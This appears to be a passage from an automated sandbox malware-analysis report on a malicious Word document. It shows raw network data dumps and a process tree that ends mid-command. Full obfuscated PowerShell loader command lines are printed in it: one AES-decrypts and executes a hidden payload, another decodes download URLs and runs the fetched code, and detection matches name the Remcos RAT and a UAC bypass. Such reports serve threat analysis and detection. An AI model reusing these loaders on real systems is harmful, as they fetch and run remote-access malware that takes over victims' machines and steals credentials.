                                                        Data Ascii: 39/f39/f39/f39/Q/6x9vi60xP/4BKFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWOdAPd/MPft7rUEYHv0cdHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dD4Vy+v//m
                                                        2024-07-26 13:11:28 UTC16384INData Raw: 74 46 68 30 5a 6c 72 47 57 6e 39 6e 50 56 57 38 70 38 37 54 59 73 78 73 58 31 54 42 42 44 4c 68 54 77 52 72 32 6c 63 78 44 4e 44 75 61 59 2f 6d 78 63 76 34 41 45 63 79 43 65 4f 74 6b 46 39 70 51 6a 75 48 46 66 48 31 47 41 4f 79 4e 35 57 44 62 39 31 51 77 73 4f 71 77 47 55 37 2b 74 33 51 53 57 76 4c 75 32 47 75 6c 70 62 55 65 58 2f 52 63 63 4c 4a 47 41 34 31 5a 33 39 48 50 4e 57 36 65 58 48 71 6d 69 4e 64 2b 71 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 45 36 35 30 38 39 4a 76 52 2f 73 43 4c 4b 32 59 65 43 72 31 30 49 77 69 38 61 69 6a 46 65 44 71 71 2f 6e 58 74 30 79 36 7a 79 34 63 55 37 36 64 4b 4e 79 2f 30 6d 54 71 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 4a
                                                        Data Ascii: tFh0ZlrGWn9nPVW8p87TYsxsX1TBBDLhTwRr2lcxDNDuaY/mxcv4AEcyCeOtkF9pQjuHFfH1GAOyN5WDb91QwsOqwGU7+t3QSWvLu2GulpbUeX/RccLJGA41Z39HPNW6eXHqmiNd+qrfLhf63y4X+t8uF/rfLhf63y4X+t8uE65089JvR/sCLK2YeCr10Iwi8aijFeDqq/nXt0y6zy4cU76dKNy/0mTq3y4X+t8uF/rfLhf63y4X+t8uF/rfLhJ
                                                        2024-07-26 13:11:28 UTC16384INData Raw: 51 69 59 49 77 69 70 52 53 6b 2f 45 76 77 74 4c 63 49 59 4a 59 59 30 53 53 55 4c 41 50 53 51 4a 32 6c 59 49 34 63 37 62 5a 4c 4c 44 50 44 42 6d 42 67 73 2b 4d 6b 45 4f 42 31 4d 48 63 76 42 72 36 30 37 77 34 33 66 55 31 55 4d 4d 46 46 46 73 71 5a 6d 57 50 4c 51 53 39 71 62 77 67 30 44 6f 36 37 70 52 45 65 75 45 62 65 37 6e 42 79 56 50 51 41 2f 73 72 69 68 46 49 4d 70 4a 47 54 6a 53 30 78 6e 2f 70 76 71 47 43 47 4e 68 73 79 56 2f 54 4c 4f 66 51 77 4f 4f 42 2f 72 66 31 6b 6d 36 76 79 34 62 4d 55 78 74 69 38 38 46 70 72 2b 67 39 6a 46 54 73 67 64 39 57 61 6b 42 4c 6b 68 72 76 6e 73 74 73 44 4f 72 43 76 36 6a 51 52 45 76 35 4a 55 34 63 76 52 6d 43 4d 55 61 77 4a 52 53 77 5a 72 39 72 48 66 4c 44 6a 4a 42 50 6f 5a 6a 42 33 4a 67 4f 67 61 79 32 73 69 30 49 48 56
                                                        Data Ascii: QiYIwipRSk/EvwtLcIYJYY0SSULAPSQJ2lYI4c7bZLLDPDBmBgs+MkEOB1MHcvBr607w43fU1UMMFFFsqZmWPLQS9qbwg0Do67pREeuEbe7nByVPQA/srihFIMpJGTjS0xn/pvqGCGNhsyV/TLOfQwOOB/rf1km6vy4bMUxti88Fpr+g9jFTsgd9WakBLkhrvnstsDOrCv6jQREv5JU4cvRmCMUawJRSwZr9rHfLDjJBPoZjB3JgOgay2si0IHV
                                                        2024-07-26 13:11:29 UTC16384INData Raw: 36 76 34 79 43 2b 48 63 32 32 39 35 61 4e 4a 36 30 38 46 49 72 4a 45 49 6a 2b 30 4c 70 2b 45 61 33 79 37 76 74 69 6a 65 42 2f 39 58 59 71 4a 53 52 48 42 33 36 74 38 6d 69 35 2b 30 77 58 65 33 33 72 59 4a 47 58 61 52 64 57 4c 44 53 4f 2f 49 72 69 61 47 6b 30 56 30 78 50 54 73 72 4d 7a 4c 76 7a 31 43 46 47 31 78 53 32 4e 57 68 31 55 6d 5a 4a 31 70 76 2b 70 62 4b 33 74 59 37 68 62 66 6b 4b 4e 67 6a 79 72 4c 66 30 47 42 54 67 66 36 32 6a 57 43 42 43 4c 4d 54 2b 58 4c 35 69 75 7a 31 7a 45 45 56 39 36 46 54 32 70 50 30 68 67 45 53 67 65 37 4b 51 6d 50 4b 43 4f 62 6b 79 4a 4d 6a 36 48 64 59 37 7a 74 2f 4e 44 38 4f 7a 5a 73 67 38 64 50 4f 54 71 2b 36 34 6e 59 76 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 61 61 38 57
                                                        Data Ascii: 6v4yC+Hc2295aNJ608FIrJEIj+0Lp+Ea3y7vtijeB/9XYqJSRHB36t8mi5+0wXe33rYJGXaRdWLDSO/IriaGk0V0xPTsrMzLvz1CFG1xS2NWh1UmZJ1pv+pbK3tY7hbfkKNgjyrLf0GBTgf62jWCBCLMT+XL5iuz1zEEV96FT2pP0hgESge7KQmPKCObkyJMj6HdY7zt/ND8OzZsg8dPOTq+64nYvhf63y4X+t8uF/rfLhf63y4X+t8uF/raa8W
                                                        2024-07-26 13:11:29 UTC16384INData Raw: 39 35 4e 43 65 51 63 77 74 51 43 73 70 33 4b 54 46 37 42 33 61 37 62 32 57 74 31 2f 6c 6f 6f 4a 46 37 56 65 44 66 4e 78 4b 7a 31 34 44 69 56 45 37 30 62 66 4e 66 70 4a 31 4e 7a 48 6d 34 4a 55 6f 44 42 59 76 2b 35 61 69 58 76 2f 66 4c 73 62 68 67 32 5a 6e 7a 6c 4e 69 39 39 2f 4d 70 75 61 33 4a 59 56 64 6c 63 74 45 31 2f 30 69 51 6d 50 4f 74 59 4c 32 78 4c 46 79 55 4c 42 6a 32 42 39 2f 74 59 4c 30 6e 51 62 53 72 2b 32 35 6f 6d 61 54 6b 66 42 6b 6f 4e 4a 31 30 39 45 52 36 68 6e 76 67 64 54 2b 4a 79 5a 75 44 6c 51 64 6a 6e 77 59 62 31 4b 37 45 36 4c 2b 71 65 71 4f 31 37 7a 55 6e 59 4e 5a 47 6f 58 39 63 38 33 63 71 4a 53 33 79 43 42 65 74 77 75 46 2f 52 54 44 73 65 36 32 69 43 55 41 58 38 4f 48 32 4f 43 6a 67 66 36 32 69 57 52 51 47 64 64 35 4b 2b 4b 6d 6f 4d
                                                        Data Ascii: 95NCeQcwtQCsp3KTF7B3a7b2Wt1/looJF7VeDfNxKz14DiVE70bfNfpJ1NzHm4JUoDBYv+5aiXv/fLsbhg2ZnzlNi99/Mpua3JYVdlctE1/0iQmPOtYL2xLFyULBj2B9/tYL0nQbSr+25omaTkfBkoNJ109ER6hnvgdT+JyZuDlQdjnwYb1K7E6L+qeqO17zUnYNZGoX9c83cqJS3yCBetwuF/RTDse62iCUAX8OH2OCjgf62iWRQGdd5K+KmoM
                                                        2024-07-26 13:11:29 UTC1536INData Raw: 59 59 54 31 6d 56 42 6d 53 6e 4a 45 39 61 66 71 33 79 58 69 31 54 4d 65 54 37 64 6e 4d 57 36 4d 30 73 75 52 6b 6f 4b 32 43 51 35 6d 4f 32 53 31 73 32 53 2f 35 43 68 4f 79 35 68 66 4d 61 39 42 42 4a 34 48 2b 74 57 73 61 48 4b 44 41 6d 66 41 6a 7a 61 34 75 55 4f 6d 42 4d 77 78 38 6f 37 69 7a 42 79 59 33 4f 63 47 42 55 34 5a 59 4a 75 79 6b 67 5a 61 55 6b 64 77 5a 2b 72 66 4a 5a 6b 77 56 46 74 52 6c 61 4d 42 65 46 67 4c 58 33 58 38 33 48 69 68 63 39 65 74 53 31 56 2f 57 64 47 56 6f 31 36 2f 43 73 4d 57 72 36 53 76 50 68 66 32 72 78 41 69 67 32 2b 6d 42 55 38 2f 35 38 55 46 6f 77 72 6d 39 6c 6e 57 42 4d 4a 61 4d 2f 5a 53 7a 42 55 6c 76 44 46 57 57 4a 4b 52 55 6d 2b 76 7a 77 34 58 39 49 6f 42 68 4d 4b 54 4a 67 79 76 7a 77 34 58 2b 4c 2b 5a 7a 44 2b 6b 31 6d 66
                                                        Data Ascii: YYT1mVBmSnJE9afq3yXi1TMeT7dnMW6M0suRkoK2CQ5mO2S1s2S/5ChOy5hfMa9BBJ4H+tWsaHKDAmfAjza4uUOmBMwx8o7izByY3OcGBU4ZYJuykgZaUkdwZ+rfJZkwVFtRlaMBeFgLX3X83Hihc9etS1V/WdGVo16/CsMWr6SvPhf2rxAig2+mBU8/58UFowrm9lnWBMJaM/ZSzBUlvDFWWJKRUm+vzw4X9IoBhMKTJgyvzw4X+L+ZzD+k1mf


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:09:10:42
                                                        Start date:26/07/2024
                                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                        Imagebase:0x13fd70000
                                                        File size:1'423'704 bytes
                                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:2
                                                        Start time:09:10:43
                                                        Start date:26/07/2024
                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                        Imagebase:0x400000
                                                        File size:543'304 bytes
                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:09:10:46
                                                        Start date:26/07/2024
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS"
                                                        Imagebase:0x8e0000
                                                        File size:141'824 bytes
                                                        MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:09:10:46
                                                        Start date:26/07/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
                                                        Imagebase:0x10a0000
                                                        File size:427'008 bytes
                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:09:10:53
                                                        Start date:26/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                        Imagebase:0x13e0000
                                                        File size:64'704 bytes
                                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:10
                                                        Start time:09:11:05
                                                        Start date:26/07/2024
                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                        Imagebase:0x400000
                                                        File size:543'304 bytes
                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:11
                                                        Start time:09:11:08
                                                        Start date:26/07/2024
                                                        Path:C:\Windows\SysWOW64\wscript.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"
                                                        Imagebase:0x120000
                                                        File size:141'824 bytes
                                                        MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:09:11:10
                                                        Start date:26/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwnuifnnlmnppbptlmxfdtbrgppi"
                                                        Imagebase:0x13e0000
                                                        File size:64'704 bytes
                                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:09:11:10
                                                        Start date:26/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uqsnjxygzufcshdfcxkgggwipdhrwsi"
                                                        Imagebase:0x13e0000
                                                        File size:64'704 bytes
                                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:09:11:10
                                                        Start date:26/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uqsnjxygzufcshdfcxkgggwipdhrwsi"
                                                        Imagebase:0x13e0000
                                                        File size:64'704 bytes
                                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:09:11:10
                                                        Start date:26/07/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\fkyx"
                                                        Imagebase:0x13e0000
                                                        File size:64'704 bytes
                                                        MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:09:11:11
                                                        Start date:26/07/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
                                                        Imagebase:0xc0000
                                                        File size:427'008 bytes
                                                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:20
                                                        Start time:09:11:13
                                                        Start date:26/07/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                                                        Imagebase:0x4ab40000
                                                        File size:302'592 bytes
                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:09:11:32
                                                        Start date:26/07/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' 